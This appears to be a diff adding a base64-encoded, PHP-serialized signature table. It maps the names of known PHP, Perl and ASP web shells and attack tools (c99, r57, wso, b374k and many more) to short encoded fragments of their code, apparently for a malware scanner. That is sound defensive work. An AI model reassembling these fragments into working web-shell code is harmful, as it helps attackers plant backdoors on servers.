+aGxiR3hmWm1GclpWOXVZVzFsSUQwZ0lsTmxjblpsY2lCTWIyIjtzOjIyOiJkZXZpbHpzaGVsbFsx +XVswXVtwaHBdIjtzOjY0OiJ5WWpNVFl3TlRzbUl6RTJNRGc3SmlNeE5qQXlPeVlqTVRVNU16czhM +Mlp2Ym5RK1BDOXpjR0Z1UGp4bWIyNTBJIjtzOjE0OiJjOTlbN11bMF1bcGhwXSI7czo2NDoiaGJX +VXBPdzBLZlEwS1pXeHpaV2xtS0NSZlVFOVRWRnNuZEhsd1pTZGRQVDAzS1EwS2V3MEtaV05vYnlC +aGJHbCI7czoyMDoicm9vdHNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlJ6aE9lR3N3YjFCa1IxbEdZ +Mk5CV0VWVFRUUnRhMWRLVERNMUwyWnFVVFEwVERoelZUUkZNMm94VDFacGJGQm4iO3M6MTQ6ImM5 +OVszXVswXVtwaHBdIjtzOjY0OiJITW9KSFkyTm1JeE9EZzJOaXdnTkRBNU5pa3BJSHNnSkhZNFpE +YzNOMll6T0NBdVBTQWtkak0wTVdKbE9UZGtPIjtzOjE1OiJzcGFtWzFdWzBdW3BocF0iO3M6NjQ6 +IklHUmxiR1YwWlNCMGFHVWdaM3BwY0NCbWFXeGxJR0ZzYzI4dUlFa2djbVZqYjIxdFpXNWtJR3hs +WVhacGJtY2ciO3M6MTc6ImJhY2t1cFsxXVsyXVtwaHBdIjtzOjY0OiJwWmlocGMzTmxkQ2drWTIx +a1d6RmRLU0FtSmlBa1kyMWtXekZkSUQwOUlqQXdNU0lwRFFvZ0lDQWdJQ0FnZXcwIjtzOjE1OiJw +Ym90WzBdWzBdW3BocF0iO3M6NjQ6ImJreHVNMUZpVkZKamIwaFVhR3REUWxKVVNYcG5VazFaUVVa +U2JWbHZOWEJJY1VGSGFucFdjV2hEWTNGblIzQmoiO3M6MTk6IndlYnNoZWxsWzBdWzBdW3BocF0i +O3M6NjQ6ImlJaTRrY0hka0xpSmNJaUF2UGdvSkNUd3ZabTl5YlQ0S0NRazhMMlJwZGo0aU93b0pD +U1J6WDNKbGMzVnNkQ0EiO3M6MTY6ImIzNzRrWzhdWzBdW3BocF0iO3M6NjQ6IjFaMlVETTNURVZC +VkdGdlVYQkVVRzAwVDFOellucFRlVTEwWWk5MmVqQkpOVzltUkdwMU56WTBiMG95TlZSaVciO3M6 +MTQ6ImM5OVswXVswXVtwaHBdIjtzOjY0OiJJQ0FnSkhCeVkzTWdQU0JoY25KaGVTZ3BPdzBLSUNB +Z0lDQWdkVzV6WlhRb0pITjBZV05yV3pCZEtUc05DaUFnIjtzOjIyOiJGYVRhTGlzVGlDelsxXVsw +XVtwaHBdIjtzOjY0OiJ4dmNqMGlVbVZrSWo0Z0NpQWdJQ0FnSUNBZ0lDQThkR1Y0ZEdGeVpXRWdi +bUZ0WlQwaVpIVjZaVzU0SWlBS0lDIjtzOjE5OiJrbGFzdmF5dlswXVswXVthc3BdIjtzOjY0OiJT +V1ZIWkVSRFpXUkxWa3BmVGtGUE5ua3FkSGxuY2tocWNDcE1ORXBhT1hwQmVrNXpaa2xYVEUxQ05G +cEhNblJ5IjtzOjE1OiJ3c29bMTRdWzBdW3BocF0iO3M6NjQ6ImlBa2NHOXlkR0VzSUZCeWIzUnZJ +RDArSUNkMFkzQW5MQ0JVYVcxbGIzVjBJRDArSURRcE93b2dJQ0FnSUNBZ0kiO3M6MTg6InNoZWxs +Ym90WzFdWzBdW3BsXSI7czo2NDoiVEF3SlNJZ2FXUTlJa0YxZEc5T2RXMWlaWEkwSWlCb1pXbG5h +SFE5SWpFNUlqNEtJQ0FnSUNBZ0lDQWdJRHgwYyI7czoxNzoicGh2YXl2WzBdWzBdW3BocF0iO3M6 +NjQ6ImxsYm5SbExUNXlaVzF2ZG1Vb0pHWm9LVHNLSUNBZ0lDQWdKR1pvTFQ1amJHOXpaVHNLSUNB +Z0lDQWdaR1ZzWlgiO3M6MTU6InpvcnJvWzFdWzBdW3BsXSI7czo2NDoic2JtdGhTSE41VlRZNFNI +cHhTa3R5Tmk5bU4zbFpUVmh5WVdOV1luZG1UMVpxVEhobVRtTTNkVmgwSzNaMGNEbCI7czoxNDoi +aTQ3WzBdWzBdW3BocF0iO3M6NjQ6Ino1Y2JpSTdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0Fn +Y0hKcGJuUWdJbE5qY21sd2REb2dQR0p5SUM4K1AiO3M6MTc6Imxvc3RkY1swXVswXVtwaHBdIjtz +OjY0OiJDOHZaUzVuSUNKak9pSXNJQ0l2SWl3aUwyaHZiV1VpQ2lSMGFXMWxiR2x0YVhRZ1BTQTJN +RHNnTHk5c2FXMXBkIjtzOjE1OiJjOTlbMTJdWzBdW3BocF0iO3M6NjQ6IjNWc2RBb2diSFpCZEhS +eWFXSjFkR1Z6SUQwZ1UzQnNhWFFvUTI5dWRtVnlkRUpwYm1GeWVTaEJkSFJ5YVdKMWQiO3M6MjM6 +InJlbW92ZXhwbG9yZXJbMF1bMF1bdmJdIjtzOjY0OiJvSVdaMWJtTjBhVzl1WDJWNGFYTjBjeWh6 +YUdWc2JGOWxlR1ZqS1NsN0pHOXdiM0E5Y0c5d1pXNG9KRzlqYldRIjtzOjE3OiJla2luMHhbMF1b +MF1bcGhwXSI7czo2NDoiQ0FnSUNBZ2NISnBiblJNYjJkcGJpZ3BPdzBLQ1VCcGJtbGZjMlYwS0Nk +dmRYUndkWFJmWW5WbVptVnlhVzVuSiI7czoyMDoiMW43M2N0aW9uWzFdWzBdW3BocF0iO3M6NjQ6 +IklEd3ZkR1ErUEhSa1BqeG1iMjUwSUdOdmJHOXlQWGxsYkd4dmR6NTVZWHB0WVNCNVpYUnJhWE5w +SUhaaGNpRTgiO3M6MTc6InplaGlyNFswXVswXVthc3BdIjtzOjY0OiIyWVhJZ2N5eGhMR2tzYWl4 +eUxHTXNiQ3hpUFdSdlkzVnRaVzUwTG1kbGRFVnNaVzFsYm5SelFubFVZV2RPWVcxIjtzOjE1OiJ3 +c29bMjBdWzBdW3BocF0iO3M6NjQ6Ims3RFFvZ0lDQjlEUW9nSUNCcFppQW9YQ1JqWVhObElEMStJ +QzllYlhOblhITXJLRnhUS3lrZ0tDNHFLUzhwSUgiO3M6MjA6ImVneXNwaWRlclsxXVswXVtwaHBd +IjtzOjY0OiJUZHlJN0RRb2tjRzl5ZEZzeU1UQTJYU0E5SUNKTldrRlFJanNOQ2lSd2IzSjBXekl4 +TkRCZElEMGdJa1JsWlhCIjtzOjE0OiJnZnNbMl1bMF1bcGhwXSI7czo2NDoiMldsVXphMmhFVEV0 +RGJHeHliMnMwUjA1WFNGZG5jMU5VZVZocE0xZHZkVmxMV0RWbVUweHlXR3h5U0ZsV1NrZCI7czoy +NToic2hlbGxfdXBsb2FkZXJbOV1bMF1bcGhwXSI7czo2NDoiRGV5UmtZMk56YjJOcmZYdGpkWEpp +ZVhSbGZTQTlJREE3RFFvZ0lDUkVRME43SkdSalkzTnZZMnQ5ZTJGeWNYViI7czoxODoic2hlbGxi +b3RbMF1bMF1bcGxdIjtzOjY0OiIzZ3NKR1YwTENSbWIyOTBaWElzSkdoamQyUTdEUXBsWTJodklD +YzhhVzFuSUhOeVl6MGlhSFIwY0RvdkwzY3diIjtzOjE1OiJvYmV0WzBdWzBdW3BocF0iO3M6NjQ6 +IjI5eVlYUnBiMjQ2Ym05dVpRcDlDaTh2TFMwK0Nqd3ZjM1I1YkdVK0Nqd3ZhR1ZoWkQ0S1BHSnZa +SGsrQ2p3L0MiO3M6MTY6Im15c3FsWzFdWzBdW3BocF0iO3M6NjQ6ImtwS1NsN0RRcGxZMmh2S0NK +VFlXWmxJRTF2WkdVZ2IyWWdkR2hwY3lCVFpYSjJaWElnYVhNZ09pQWlLVHNOQ20iO3M6MTU6ImNt +ZFsyMl1bMF1bcGhwXSI7czo2NDoiRkkrQ2p3L2NHaHdDaUFnZlFvL1Bnb2dJRHhVVWo0S0NpQWdQ +RlJFUGp4RVNWWWdVMVJaVEVVOUltWnZiblF0WiI7czoxNjoiaDRudHVbMF1bMF1bcGhwXSI7czo2 +NDoiZGZZbXhoYm1zbklHaHlaV1k5SnlSamIyNW1hV2NuUG1OdmJtWnBaend2WVQ0OEwzUmtQangw +WkQ0aUxpUnlMaSI7czoxODoic3ltbGlua1sxXVswXVtwaHBdIjtzOjY0OiJOUU0yTnBORTFUY21s +WGRrVlROVEZWYjJORlRFVXZVSGxaYUdOWmFrZHJialpSYldJelIwdzBPRkF3V0Zwa2JrIjtzOjE0 +OiJyNTdbNF1bMF1bcGhwXSI7czo2NDoiWW1zd2RrNVhOSFpSVlhCMVREQXdNV0pwT1dGalJ6UjJZ +bFp3ZFV3emNFdGlhVGgyVDBoa1FsRlZNVE5SVTBsMSI7czoyMToibG9jdXNzaGVsbFswXVswXVtw +aHBdIjtzOjY0OiJNeldqWmtiMEZhZVdkc2JXRkZaRmxtZGk5SmJtMXVhVlZJZEdWbVJFRkphWE5z +UW1kQ1QyRTJha0phS3pCYWVVIjtzOjE5OiJmaWxlc21hblszXVswXVtwaHBdIjtzOjY0OiIwUWxS +bWVVUm1abmRCUkRRMmNVRkJRVUZwTXpNNGFUQXdUWGRtT0VWVU5ERk5UV1o1UkM5Nk9USkJNbTh2 +V0RSIjtzOjE4OiJ3YWNraW5nWzBdWzBdW3BocF0iO3M6NjQ6IlJjZURZNWIyNWhiR3g1TENCY2VE +WXhJRng0TXpRd05DQk9YSGcyWm5SY2VESXdYSGcwTmx4NE5tWmNlRGMxYm0iO3M6MTU6Indzb1sx +N11bMF1bcGhwXSI7czo2NDoiazF2UVUwd04waExWVTkzUzJKMVJIZDZjM2R5ZFdKT2FuSmxWVVJH +VjJkRVFrRjNZV3BDTTBGcFlVaEhkbVoxZSI7czoyMDoic3R1bnNoZWxsWzFdWzBdW3BocF0iO3M6 +NjQ6IkNSMk0yUXlObUl3WWpFcElIc2daMnh2WW1Gc0lDUjJOakU1WkRjMVpqZzdJR2xtSUNnaGFX +NWZZWEp5WVhrb0oiO3M6MTU6InNwYW1bMF1bMF1bcGhwXSI7czo2NDoiRm9NR1E1VTBSU1Z6SnRU +MkpZVWpsNGRGcDVjVVZhVm5wdWVuWjJRVWhhTURkemVtUkZOekJNVG10VVVVNWthMyI7czoyMDoi +MW43M2N0aW9uWzJdWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdMeThOQ2k4dkx5OHZMeTh2THk4dkx5 +OHZMeTh2THk4dkx5OHZMeTh2THk4dkx5OE5DZzBLRFFwcFoiO3M6MTk6InNhZmVtb2RlWzRdWzBd +W3BocF0iO3M6NjQ6ImpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJd29LSTFZZ1kyVnNhbUZvSUc1 +bGMyRnVhMk5wYjI1cGNtOTJZVzUiO3M6MTU6Imx1cm1bMF1bMF1bY2dpXSI7czo2NDoiazdJR1Y0 +YVhRN0lIMGdQejQ4UDNCb2NDQnBaaWhwYzNObGRDZ2tYMGRGVkZzaWREYzJNalJ1SWwwcEtYc2dJ +QyI7czoxOToiZmlsZXNtYW5bN11bMF1bcGhwXSI7czo2NDoidmRISStYRzRpT3dvS0lDQUpaV05v +YnlBaVBDOTBZV0pzWlQ0OEwzUmtQaUk3Q2dvZ0NXVmphRzhnSWp3dmRHRiI7czoyMDoicGhwc2hl +bGxbMTZdWzBdW3BocF0iO3M6NjQ6IkdWdVpDSTdEUXBpY21WaGF6c05DZzBLRFFvdkwxQklVQ0JG +ZG1Gc0lFTnZaR1VnWlhobFkzVjBhVzl1RFFwalkiO3M6MjE6ImthZG90c2hlbGxbMV1bMF1bcGhw +XSI7czo2NDoibVp2Y21zN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUhONWMzUmxiU0FvWUNScmFXeHNa +R0FwT3cwS0lDQWdJQ0FnSSI7czoxNzoiaXJjX2JvdFsxXVswXVtwbF0iO3M6NjQ6Im1JekV3Tnpj +N0ppTXhNRGcxT3ljc0NpZHlkVjkwWlhoME5qUW5QVDRuSmlNeE1EUTBPeVlqTVRBNE1Ec21JekUi +O3M6MTQ6InI1N1syXVswXVtwaHBdIjtzOjY0OiIyUmxkWE1nVUdWeWJDQlNaVzF2ZEdVZ1UyaGxi +R3hjYmlJN0NncHplWE4wWlcwb1pHRjBaU2s3Q2dwemVYTjBaIjtzOjE4OiJhc21vZGV1c1swXVsw +XVtwbF0iO3M6NjQ6IlBEOXdhSEFOQ21sbUtDUmZVRTlUVkZzaWEyVjVJbDBnUFQwZ0ltWXdaR1Zr +TkRka1ptRTRZVE00WkdRME5tVTUiO3M6MTU6ImNtZFsxMF1bMF1bcGhwXSI7czo2NDoiNWhiV1U5 +TVNOamIyNTJaWEowUG0xa05Ud3ZZVDRwUEM5b01qNDhVRDRpT3dvS0lDQWdhV1lnS0NGcGMzTmxk +QyI7czoyMToicmVtb3Rldmlld1swXVswXVtwaHBdIjtzOjY0OiJkWUszVm1NRmdyVlVSdVkwbEVN +VEY0UldreVVrVlFhREJrVGpGa2JuRm9SVkY2YkRobmRsQnZUbGxtU0RGU2NYIjtzOjE0OiJyNTdb +OV1bMF1bcGhwXSI7czo2NDoiSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDUmthWEpmYkds +emRDQTlJR2x0WVhCZmJHbHpkQ2drYzNSeSI7czoyMzoic2hlbGxhcmNoaXZlWzBdWzBdW3BocF0i +O3M6NjQ6ImduTDJodmJXVXZKeTRrZFhObGNpNG5MM0IxWW14cFkxOW9kRzFzTDJGalkyVnpYM2Rs +WWk5amIyNW1hV2N1Y0ciO3M6MTk6InByaXY4X3NjclswXVswXVtwbF0iO3M6NjQ6InlPWEZtY0ha +RVdqSXdlVlpWV0VGUUlpd2lNazk1TldoV1VYaFVZazlyUWxNcmFUUmFVRVZFWm5ObVNqRXpSa1Yi +O3M6MjA6InBocHNoZWxsWzExXVswXVtwaHBdIjtzOjY0OiJsWFVrRnhPWEJRVTBKU2MwNTFZbmhr +T1N0WVlXaDJkMDVsU1hGRWRGSllSSEV2ZUZGTFdFTmxWRGx4SzNRTkNrIjtzOjE2OiJiMzc0a1s3 +XVswXVtwaHBdIjtzOjY0OiJRdVlYQndaVzVrUTJocGJHUW9aV1JwZENrN1ptbGxiR1F1YzNSNWJH +VXVaR2x6Y0d4aGVUMG5ibTl1WlNjN1pXIjtzOjI0OiJteXNxbF9hZG1pbmVyWzBdWzJdW3BocF0i +O3M6NjQ6ImNtUmxjam9nTVhCNElITnZiR2xrSUNORFFrRkNOemc3SUgwS0kyTnZiblJsYm5RZ2V5 +QndZV1JrYVc1bk9pQXgiO3M6MjA6ImxvYWRzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJCVlYzSTBj +M0EwVUVVdmRYTkJRM3A1U0U1alF6UTVaMUU0VEVab1puUnhPREJCT0hWSVEzaFVLMGNyYVc1Q1Zt +IjtzOjIwOiJmaWxlc21hblsxNl1bMF1bcGhwXSI7czo2NDoiWDJWNGFYTjBjeWdpYldGcGJDSXBL +WHNOQ21WamFHOGdKSFJoWW14bFgzVndNUzRrYkdGdVoxc2tiR0Z1WjNWaCI7czoxNDoicjU3WzZd +WzBdW3BocF0iO3M6NjQ6IlUxUkZ4YlhTOW5MQ0FpVzEwaUtUc0tDUWtKQ1ZSRWMyaGxiR3hmZEdG +aWMxOXRiMlJwWm5sZmRHRmlLR04xY24iO3M6MTg6InRkc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi +TUNrN0NRb2dhV1lvSVNSamIyNXVaV04wYVc5dUtTQjdJR1psS0NSc1lXNW5kV0ZuWlN3d0tUc2dm +UW9nWld4eiI7czoxNToicjU3WzE5XVswXVtwaHBdIjtzOjY0OiJJaVJ5WldGc0wzTndiRzlwZEhv +dWVtbHdJanNnUHo0aVBqeGljajQ4WW5JK0lBbzhhVzV3ZFhRZ2RIbHdaVDF6IjtzOjE0OiJjOTlb +NF1bMF1bcGhwXSI7czo2NDoiUTdQQzltYjI1MFBpSXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQThj +Mk55YVhCMElIUjVjR1U5SW5SbGVIUXZhbSI7czoyMToicmVtb3Rldmlld1sxXVswXVtwaHBdIjtz +OjY0OiJKRVpQVWsxN1JFWkpURVY5S1NsYk4xMDdDaUFnSUNna1ptbHNaVzVoYldVZ1BTQWtSazlT +VFh0RVJrbE1SWDBwIjtzOjIyOiJwZXJsd2Vic2hlbGxbMF1bMF1bcGxdIjtzOjY0OiJkVFV5Y3NK +M2RsZWpkUVZ6QTVSa1pXY0RkU1pFcHNKeXduYmtsSGNpdFhiRFpDVDNZNGNsUjVkVmNuTENkVldX +IjtzOjIwOiJwaHBzaGVsbFsxMF1bMF1bcGhwXSI7czo2NDoiWDNJb0pFZE1UMEpCVEZNcE95Y3NE +UW9KSjNCb2NGOXBibWtuQ1QwK0NTY2tTVTVKUFdsdWFWOW5aWFJmWVd4cyI7czoxODoiZHhzaGVs +bFsyXVswXVtwaHBdIjtzOjY0OiJHUWdibTkzY21Gd1BpMHRQQzkwWkQ0bktUc0tDUWtKY0NnblBI +UmtJRzV2ZDNKaGNENG5LVHNLQ1FrSmNDZ25QIjtzOjE3OiJwaHBzcHlbNF1bMF1bcGhwXSI7czo2 +NDoibHVaM01uWFZzblptbHNaUzExY0d4dllXUW5YU2tnZXlBL1BnbzhZbkkrUEdKeVBnbzhabWxs +YkdSelpYUStDaSI7czoyMDoicGhwc2hlbGxbMTldWzBdW3BocF0iO3M6NjQ6IitTR1Y0UEM5MFpE +NDhkR1FnZDJsa2RHZzlKekkxSlNjZ1ltZGpiMnh2Y2owbkl6STRNamd5T0NjK1BDOTBaRDQiO3M6 +MTc6ImphY2thbFs0XVswXVtwaHBdIjtzOjY0OiJnWEc0aU93cGxZMmh2SUNJOFlTQm9jbVZtUFNj +a1VFaFFYMU5GVEVZL1lXTjBhVzl1UFhacFpYZEVZWFJoSm1SIjtzOjE2OiJteXNxbFswXVswXVtw +aHBdIjtzOjY0OiJZM2xtUVdGWWFWbEJXRUl6UVZOQlNFZzBRM2xCWVVGWU5XMXdkbUZYTkc5S2VH +WjNUMmxqYzBKRFJYQkdRa0k1IjtzOjE1OiJ3c29bMTNdWzBdW3BocF0iO3M6NjQ6InNJR1poYkhO +bElDazdEUXBvWldGa1pYSW9JQ2RRY21GbmJXRTZJRzV2TFdOaFkyaGxKeUFwT3cwS0RRcGxZMmgi +O3M6MjA6ImV4dHBsb3JlclswXVsyXVtwaHBdIjtzOjY0OiJWVGVYTjBaVzFQWW1wbFkzUWlLUW9K +Q1ZObGRDQm1JRDBnWm5OdkxrZGxkRVpwYkdVb2MzUnlSbWxzWlc1aGJXIjtzOjE3OiJyaHRvb2xb +MV1bMF1bYXNwXSI7czo2NDoiblF1UFNSc1lXNW5XeWQxY0d4dllXUnZheWRkT3dwOUNncHBaaWhw +YzNObGRDZ2tYMUJQVTFSYkozVndiRzloWiI7czoyMToiZmF0YWxzaGVsbFswXVswXVtwaHBdIjtz +OjY0OiJGWktUekpqV0c5b2NGWm1ORGtyVDJaMk4wbzRXRVk0ZDBSRk0wdFJLMlpSZGxwblQwSkVR +bGhSWkhGSllqaG9UIjtzOjIwOiJwaHBzaGVsbFszNF1bMF1bcGhwXSI7czo2NDoiSFV3TURZelhI +VXdNRFkxWEhVd01EWTBYSFV3TURZNVhIVXdNRFpEWEhVd01ETkNYSFV3TURJMlhIVXdNREl6WCI7 +czoxNToiY21kWzE5XVswXVtwaHBdIjtzOjY0OiJ5SWlrdVZtRnNkV1VLQ1cxaGVEMXZZbXBWY0d4 +dllXUXVSbWxsYkdSektDSnRZWGdpS1M1V1lXeDFaUW9LQ1daIjtzOjE3OiJ6ZWhpcjRbMV1bMF1b +cGhwXSI7czo2NDoidldVOXJPSE54T0dWalVtcEliakZtVjBKNEt6TXlhbmRtVlhKQ2VuQTNXVWRK +WkhsbE1scENiR2xLV25KaVpYUSI7czoyMDoicGhwc2hlbGxbMzZdWzBdW3BocF0iO3M6NjQ6ImMy +aHphR1Y0YVhRb0tUdDlDbWxtSUNna1lXTjBJRDA5SUNKelpXTjFjbWwwZVNJcENuc0tJR1ZqYUc4 +Z0lqeGoiO3M6MTU6ImM5OVsyNF1bMF1bcGhwXSI7czo2NDoiZEdnaUxDSjNLeUlwT3dvSlpuZHlh +WFJsSUNna1puQXNJaUlwSURzS0NXWjNjbWwwWlNBb0pHWndMQ1J6WVhabCI7czoyMjoic2ltYXR0 +YWNrZXJbMV1bMF1bcGhwXSI7czo2NDoiY2xkNWRHWlZNM05SUTJVNVlVWlliVk5OWkVOU1NFWjBS +REJtTURaVVREZExlVzluT1VKWmRscFFSRVZUTkd4RCI7czoxNToid3NvWzE1XVswXVtwaHBdIjtz +OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FrWkc5elBTQWlRdlo1YkdVZ1FtbHlJRVJ2 +YzNsaElGWmhjbVI1IjtzOjE4OiJjYXN1czE1WzBdWzBdW3BocF0iO3M6NjQ6IjFsUFNReFhHNWNi +aUk3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQjNhR2xzWlNnOFUwVk9SRVpKVEUiO3M6 +MTY6InRlbG5ldFswXVswXVtwbF0iO3M6NjQ6InlLRUJwYm1sZloyVjBLQ0p6WVdabFgyMXZaR1Vp +S1NrZ1BUMGdJbTl1SWlrZ2V5QWdKSE5oWm1WdGIyUmxJRDAiO3M6MzY6ImNyaXN0ZXJjb3JwX2lu +Zm9jb2xsZWN0b3JbMF1bMF1bcGhwXSI7czo2NDoiWnBaeTV3YUhBaUxBMEtDUWtpYkc5allYUmxJ +R052Ym1acFp5NXBibU1pSUQwK0lDSnNiMk5oZEdVZ1kyOXVabSI7czoyMDoiZmlsZXNtYW5bMjRd +WzBdW3BocF0iO3M6NjQ6ImpWRkJLVHpocmFFZHdaMjAxZDFoYVNscDBjbkZUYlU1MksydElTVkZJ +T1U5clZVOWlhQ3RDUlZoRGNXNVNlVGwiO3M6MjI6InRiZHNlY3VyaXR5WzBdWzBdW3BocF0iO3M6 +NjQ6IkZVU0doU1UyNUtSVk5IZDNsT01XUmhUVEExWVdOWVZUQk9WRmt4VkRGV2FGcFdRbTVQVnpr +MldYazVTRlF5VlQiO3M6MTU6Indzb1sxMl1bMF1bcGhwXSI7czo2NDoiRFZFMTRha1JVVDFaVVpW +bDBTR0ZzYzBkMWJtTklWR3gyWTNKR2VFWXdXRnBWYlc1S1R6TnBXRU5OTVdwbWJFeCI7czoxOToi +YmFja2Rvb3JbM11bMF1bcGhwXSI7czo2NDoiek12YjBwT1dtMU5OMDVRUW5JMVkzaHlhekJ6TlVR +clUzRnFNa2hhWWs1bmNHcExLMmhFTTBjaUxDSkllazVQViI7czoyNToic2hlbGxfdXBsb2FkZXJb +NF1bMF1bcGhwXSI7czo2NDoiVng0TkRoY2VEWTJYSGd6TTF4NE5EbGNlRFUwWEhnMVpWeDRObUpj +ZURNMVhIZzBNRng0TTJOY2VEWTVYSGd6TiI7czoxODoicG9zdG1hblswXVsxXVtwaHBdIjtzOjY0 +OiJObFltVmlaV0luUGcwS1BHTmxiblJsY2o0TkNqeGlQanhtYjI1MElITnBlbVU5SnpZbklHWmhZ +MlU5SjFkbFltIjtzOjE3OiJjb2RlcnpbMl1bMF1bcGhwXSI7czo2NDoiSE9XdFFWa0pRVlRGUksx +QkhiSFZqU0ZZd1NVaFNOV05IVlRsaFIyeHJXa2RXZFVsSE5XaGlWMVU1V1ZkT01FbCI7czoyMToi +bG9jdXNzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJOcGRHVXNJRGd3TENBa1pYSnlibThzSUNSbGNu +SnpkSElzSURNd0tUc2dEUXBwWmlBb0lTUm1jQ2tnZXlBTkNpIjtzOjE5OiJuaXhzaGVsbFsxXVsw +XVtwaHBdIjtzOjY0OiJWL2paQXhVSUJPMGM4ektjU210MXJnTmhOMHk4Z21PeHB3bHhkRzREWkxK +QVY1dHFkcHFtS3d1cDVFeUM2SlQyIjtzOjE5OiJ3ZWJhZG1pblsxXVsyXVtwaHBdIjtzOjY0OiI5 +bk93b0tJQ0JwWmlBb0pISmxjWFZwY21VcElIc0tJQ0FnSUNNZ1lXeHNJR1p2ZFc1a0lHZHZibTVo +SUdKbElHIjtzOjE3OiJ0ZWxuZXRkWzJdWzBdW3BsXSI7czo2NDoiaHlaV1k5SWlWelAzZHZjbXRm +WkdseVBTVnpJajRsY3p3dllUNHZ0Q3dLSkZCSVVGOVRSVXhHTENCMWNteGxibSI7czoxOToicGhw +c2hlbGxbM11bMF1bcGhwXSI7czo2NDoiMFpYSStQSFJoWW14bFBqeDBjajQ4ZEdRK1BHWnZjbTBn +WVdOMGFXOXVQVndpSkZOR2FXeGxUbUZ0WlQ4a2RYSiI7czoxOToic2FmZW1vZGVbM11bMF1bcGhw +XSI7czo2NDoiY21GdVoyVW9Ja0VpTENKYUlpa2dZWE1nSkd4bGRIUmxjaWtnRFFvSmV5QU5DZ2tr +WW05dmJDQTlJRUJwYzE5ayI7czoyMDoiZGV2aWx6MGRlWzBdWzBdW3BocF0iO3M6NjQ6IjBaRDVj +YmlJN0RRcHdjbWx1ZENBaVBIUmtQbHNnUEdFZ1kyeGhjM01nUFNCY0ltaGxZV1JjSWlCb2NtVm1J +RDAiO3M6MTc6Imxvc3RkY1sxXVswXVtwaHBdIjtzOjY0OiJTVzVNYldnd1lsZDRlbU5IVm1waFYw +WnpXVEpvYUdOdVRXOUtSamxSVkRGT1ZWZDVaR2hLTVRCd1RHbGphVkJwIjtzOjIwOiJ2MGxkM20w +cnRbMF1bMF1bcGhwXSI7czo2NDoiY01tSnZkRnd5WFRvZ2NHaHdZbTkwSURJdU1DQmllVHNnSTJO +eVpYZEFZMjl5Y0M0aUtUc05DaUFnSUNBZ0lDQSI7czoxNToicGJvdFsyXVswXVtwaHBdIjtzOjY0 +OiJRdFkyOXNiM0k2SUNNd01EQXdNREE3Q24wS0xuTjBlV3hsTkNCN1ptOXVkQzEzWldsbmFIUTZJ +R0p2YkdSOUNtIjtzOjE1OiJrcmFsWzBdWzBdW3BocF0iO3M6NjQ6IlpHMUdjMlJYVlRsSmJFcHNZ +bTFHZEZwVU9HbEpRemdyUkZGdk9GQXpRbTlqUTBJNVNVZFdjMk15Vm5CYWFXZHIiO3M6MTc6Imhz +aGVsbFswXVswXVtwaHBdIjtzOjY0OiJOMkpDYmxGMmRXUjRXREp1WlZadEt6Um9NekI0TjFBeFVF +aDJXblZIWWl0WVpub3hWbVpoY2tsaGFqWmljV2haIjtzOjIwOiJob3N0ZGV2aWxbMF1bMF1bcGhw +XSI7czo2NDoiOUlFTnZiVzFoYm1SVWVYQmxMbFJsZUhRN0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqYjIx +dExrTnZiVzFoYm1SVVpYaCI7czoyMjoiYXNweC1zaGVsbFswXVswXVthc3B4XSI7czo2NDoiQ0l2 +SWl3Z0pHNWhiV1VwT3dva1puSWdQU0FpWEhnMU1GeDROR0pjZURBelhIZ3dOQ0k3Q2lSbWNpQXVQ +U0FpWCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzJdWzBdW3BocF0iO3M6NjQ6IklIc2dhV1lnS0NG +cGMxOXVkVzFsY21saktDUm1jV0pmYkdWdVoyaDBLU2tnZXlSbWNXSmZiR1Z1WjJoMElEMGciO3M6 +MjI6IkZhVGFMaXNUaUN6WzRdWzBdW3BocF0iO3M6NjQ6Im1kcGJpMXNaV1owT2lBMWNIZzdEUXA5 +RFFwcGJuQjFkQ0FzSUhSbGVIUmhjbVZoSUN3Z1luVjBkRzl1SUN3Z1kiO3M6Mjc6ImJydXRlX2Zv +cmNlX3Rvb2xbMV1bMF1bcGhwXSI7czo2NDoiZ0lEaHdkQ0FnSUNBZ0lDQWhhVzF3YjNKMFlXNTBP +d3BpWVdOclozSnZkVzVrTFdOdmJHOXlPaUFnSUNNeE1URSI7czoxODoiY3J5c3RhbFswXVswXVtw +aHBdIjtzOjY0OiJjR1U5WENKMFpYaDBYQ0krUEdKeVBncDFjMlZ5Ym1GdFpTQTZJRHhKVGxCVlZD +QnphWHBsUFZ3aU1UVmNJaUIyIjtzOjE3OiJ1cGRhdGVbMF1bMF1bcGhwXSI7czo2NDoiWEUzVTFJ +dlVITmFSRFp3V2xBNU1XTk5WQzlNT0ZkWFJYcExkbUptVkV4Sk9GaGpOa0ZxVm5wcmRuWjJOMnBw +TiI7czoyMjoiRmFUYUxpc1RpQ3pbNV1bMF1bcGhwXSI7czo2NDoiNWpkR2x2Ym5Nc0ozTm9aV3hz +WDJWNFpXTW5LU2w3SkdWNFpXTTlJSE5vWld4c1gyVjRaV01vSkdOdmJXMWhibSI7czoxNzoiamFj +a2FsWzVdWzBdW3BocF0iO3M6NjQ6ImpibFZ1UzFOcloyVXpRbWhqTTA0d1lVaEtNVXREVW1aVmEx +WlNWbFZXVkZaR2MyNWhSemt4V2tkc2RXRlRaR1IiO3M6MTQ6ImNtZFs1XVswXVtwaHBdIjtzOjY0 +OiIxUm5ObTkwSzNoRVZsbE1UM05EZGk5YWVtaDFSekZaVlZZNWRHOWhXbWRYVFVobVpWRkhUbGsz +ZFV4M01rTmtXIjtzOjE1OiJjOTlbMjNdWzBdW3BocF0iO3M6NjQ6IjFjSGdnT0hCNElDRnBiWEJ2 +Y25SaGJuUTdZbTl5WkdWeU9pQnViMjVsSUNGcGJYQnZjblJoYm5RN1ltOXlaR1YiO3M6MjA6ImNv 